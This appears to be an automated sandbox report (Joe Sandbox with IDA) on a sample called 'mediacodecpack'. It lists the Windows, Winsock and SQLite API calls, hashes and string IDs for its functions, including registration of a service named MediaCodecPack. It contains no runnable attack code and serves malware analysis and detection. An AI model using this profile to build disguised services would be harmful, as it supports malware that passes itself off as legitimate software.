                                                                                • API String ID:
                                                                                • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                APIs
                                                                                • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                • sqlite3_free.SQLITE3 ref: 60926526
                                                                                • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                • sqlite3_free.SQLITE3 ref: 60926550
                                                                                  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                  • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                • sqlite3_free.SQLITE3 ref: 60926626
                                                                                • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                • sqlite3_free.SQLITE3 ref: 60926638
                                                                                • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                • sqlite3_free.SQLITE3 ref: 60926673
                                                                                • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                • API String ID: 937752868-2111127023
                                                                                • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D024E6
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D024FC
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D0250E
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D0256D
                                                                                • SetLastError.KERNEL32(00000000,?,774CDFB0), ref: 02D0257F
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,774CDFB0), ref: 02D02599
                                                                                • GetLastError.KERNEL32(?,774CDFB0), ref: 02D025A2
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D025F0
                                                                                • InterlockedDecrement.KERNEL32(00000002), ref: 02D0262F
                                                                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D0268E
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D02699
                                                                                • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D026AD
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,774CDFB0), ref: 02D026BD
                                                                                • GetLastError.KERNEL32(?,774CDFB0), ref: 02D026C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                • String ID:
                                                                                • API String ID: 1213838671-0
                                                                                • Opcode ID: 0b0c0cf65bb061002f6d44c8cb2e31f7fd12ba4b5d885f94706b0232a7342d7b
                                                                                • Instruction ID: dff9b6183bc6aa65bff3f720e794fef06058a3f5641881dde86967a5fb36ba7d
                                                                                • Opcode Fuzzy Hash: 0b0c0cf65bb061002f6d44c8cb2e31f7fd12ba4b5d885f94706b0232a7342d7b
                                                                                • Instruction Fuzzy Hash: 53611A71901209AFCB24DFA4D99CBAEBBB9FF08314F504529E956E7390D7309D44CBA0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D04608
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                • htons.WS2_32(?), ref: 02D04669
                                                                                • htonl.WS2_32(?), ref: 02D0468C
                                                                                • htonl.WS2_32(00000000), ref: 02D04693
                                                                                • htons.WS2_32(00000000), ref: 02D04747
                                                                                • _sprintf.LIBCMT ref: 02D0475D
                                                                                  • Part of subcall function 02D07990: _memmove.LIBCMT ref: 02D079B0
                                                                                • htons.WS2_32(?), ref: 02D046B0
                                                                                  • Part of subcall function 02D0873B: __EH_prolog.LIBCMT ref: 02D08740
                                                                                  • Part of subcall function 02D0873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D087BB
                                                                                  • Part of subcall function 02D0873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D087D9
                                                                                  • Part of subcall function 02D01BA7: __EH_prolog.LIBCMT ref: 02D01BAC
                                                                                  • Part of subcall function 02D01BA7: RtlEnterCriticalSection.NTDLL ref: 02D01BBC
                                                                                  • Part of subcall function 02D01BA7: RtlLeaveCriticalSection.NTDLL ref: 02D01BEA
                                                                                  • Part of subcall function 02D01BA7: RtlEnterCriticalSection.NTDLL ref: 02D01C13
                                                                                  • Part of subcall function 02D01BA7: RtlLeaveCriticalSection.NTDLL ref: 02D01C56
                                                                                  • Part of subcall function 02D0CEF7: __EH_prolog.LIBCMT ref: 02D0CEFC
                                                                                • htonl.WS2_32(?), ref: 02D0497C
                                                                                • htonl.WS2_32(00000000), ref: 02D04983
                                                                                • htonl.WS2_32(00000000), ref: 02D049C8
                                                                                • htonl.WS2_32(00000000), ref: 02D049CF
                                                                                • htons.WS2_32(?), ref: 02D049EF
                                                                                • htons.WS2_32(?), ref: 02D049F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                • String ID:
                                                                                • API String ID: 1645262487-0
                                                                                • Opcode ID: 65021610b7184e9c41869ba175bc7c4e934b8f44281269242a36bde8d7e80da2
                                                                                • Instruction ID: 023d0d5fa9813bfc097c8516f8c1fb8a79bd0d3b5cc585ec1f7c6bdce982102e
                                                                                • Opcode Fuzzy Hash: 65021610b7184e9c41869ba175bc7c4e934b8f44281269242a36bde8d7e80da2
                                                                                • Instruction Fuzzy Hash: A4022771C00259AEEF15DBA4D894BEEBBB9EF08304F10455AE505A72A0DB746E48CFA1
                                                                                APIs
                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(MediaCodecPack,004019C8), ref: 00401A25
                                                                                • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401A84
                                                                                • GetLastError.KERNEL32 ref: 00401A86
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00401A93
                                                                                • GetLastError.KERNEL32 ref: 00401AB4
                                                                                • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401AE4
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00001897,00000000,00000000,00000000), ref: 00401AF0
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401AF9
                                                                                • CloseHandle.KERNEL32 ref: 00401B05
                                                                                • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                • String ID: MediaCodecPack
                                                                                • API String ID: 3346042915-199385074
                                                                                • Opcode ID: cca009b725d80f918f5385075355cc3301aa37e01b24cb08a35ee5e129ff42f2
                                                                                • Instruction ID: 532dd47a677431e4b3997e11c6aba14a110aa56271c5c3b89ba5cdee744870bf
                                                                                • Opcode Fuzzy Hash: cca009b725d80f918f5385075355cc3301aa37e01b24cb08a35ee5e129ff42f2
                                                                                • Instruction Fuzzy Hash: D621B8B1501244ABD3206F16EF48E967FB8EB95B55B15403EE245B23B1CBF90444CBED
                                                                                APIs
                                                                                • RtlDecodePointer.NTDLL(?), ref: 02D16EF8
                                                                                • _free.LIBCMT ref: 02D16F11
                                                                                  • Part of subcall function 02D11F84: HeapFree.KERNEL32(00000000,00000000,?,02D14942,00000000,00000104,774D0A60), ref: 02D11F98
                                                                                  • Part of subcall function 02D11F84: GetLastError.KERNEL32(00000000,?,02D14942,00000000,00000104,774D0A60), ref: 02D11FAA
                                                                                • _free.LIBCMT ref: 02D16F24
                                                                                • _free.LIBCMT ref: 02D16F42
                                                                                • _free.LIBCMT ref: 02D16F54
                                                                                • _free.LIBCMT ref: 02D16F65
                                                                                • _free.LIBCMT ref: 02D16F70
                                                                                • _free.LIBCMT ref: 02D16F94
                                                                                • RtlEncodePointer.NTDLL(009D9730), ref: 02D16F9B
                                                                                • _free.LIBCMT ref: 02D16FB0
                                                                                • _free.LIBCMT ref: 02D16FC6
                                                                                • _free.LIBCMT ref: 02D16FEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 3064303923-0
                                                                                • Opcode ID: d27d9994bb5645342f1218c69158dc51355d44b2c0127796c418d437356bee96
                                                                                • Instruction ID: 254aad05d447c8ef12bb216d6a8e79f96e08c66221081a8303190b789242e96b
                                                                                • Opcode Fuzzy Hash: d27d9994bb5645342f1218c69158dc51355d44b2c0127796c418d437356bee96
                                                                                • Instruction Fuzzy Hash: F421A137E89211BFCB216F64F84064677A9EB04735729492EE90897780CB39DC64CFE0
                                                                                APIs
                                                                                  • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                  • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                  • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                  • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                  • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                  • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                  • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                • sqlite3_free.SQLITE3 ref: 60960618
                                                                                • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                • String ID: offsets
                                                                                • API String ID: 463808202-2642679573
                                                                                • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                APIs
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                • String ID:
                                                                                • API String ID: 2903785150-0
                                                                                • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D03428
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D0346B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D03472
                                                                                • GetLastError.KERNEL32 ref: 02D03486
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D034D7
                                                                                • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D034ED
                                                                                • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D03518
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                • String ID: CancelIoEx$KERNEL32
                                                                                • API String ID: 2902213904-434325024
                                                                                • Opcode ID: 96de5521ab4d92d84a84856ae25b84e9247c16f4c78de8f5869bbcc9ccbb93d0
                                                                                • Instruction ID: a6d67598b761beeb24e8ea19e66200545f5e8eef8fe63164a26bfede3f7672be
                                                                                • Opcode Fuzzy Hash: 96de5521ab4d92d84a84856ae25b84e9247c16f4c78de8f5869bbcc9ccbb93d0
                                                                                • Instruction Fuzzy Hash: C331ABB1900215DFDB21AF64D894BAA7BB8FF59320F1184A9E8159B3A0CB70DD04CFA1
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                • String ID:
                                                                                • API String ID: 3556715608-0
                                                                                • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403EF1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408574,?,004085C4,?,?,?,Runtime Error!Program: ), ref: 004060FA
                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406112
                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406123
                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406130
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                • API String ID: 2238633743-4044615076
                                                                                • Opcode ID: 30dd77c3664451088d9a49f7b1ebdf2ed2115b5f614d26e279abac0bd39ca4ff
                                                                                • Instruction ID: 36fb3fed3a384cff097ea3fb9e63704b9da04faa094e7ece228342700e77c082
                                                                                • Opcode Fuzzy Hash: 30dd77c3664451088d9a49f7b1ebdf2ed2115b5f614d26e279abac0bd39ca4ff
                                                                                • Instruction Fuzzy Hash: E5018431700211DBC7109FB59FC0A177BE99A997C0712093FB646FA2A3DA7C88158FAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                • API String ID: 0-780898
                                                                                • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                • API String ID: 0-2604012851
                                                                                • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,00000100,00408640,00000001,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 00406409
                                                                                • LCMapStringA.KERNEL32(00000000,00000100,0040863C,00000001,00000000,00000000,?,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406425
                                                                                • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405E87,?,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 0040646E
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 004064A6
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004064FE
                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 00406514
                                                                                • LCMapStringW.KERNEL32(00000000,?,00405E87,00000000,00405E87,?,?,00405E87,00200020,00000000,?,00000000), ref: 00406547
                                                                                • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004065AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: String$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 352835431-0
                                                                                • Opcode ID: 9c7cee020c542fb800dbf7d144ed3697215e486a5166d3a559f4f8a108ac6f85
                                                                                • Instruction ID: d42c4ff00bdcea80f115aa50461d5d245c16a81543514470c81a73783c2cd3a2
                                                                                • Opcode Fuzzy Hash: 9c7cee020c542fb800dbf7d144ed3697215e486a5166d3a559f4f8a108ac6f85
                                                                                • Instruction Fuzzy Hash: 4A517B71900209FFCF229F58DD49A9F7BB9FB48750F11413AF912B12A0D7398961DBA8
                                                                                APIs
                                                                                • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                  • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                  • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
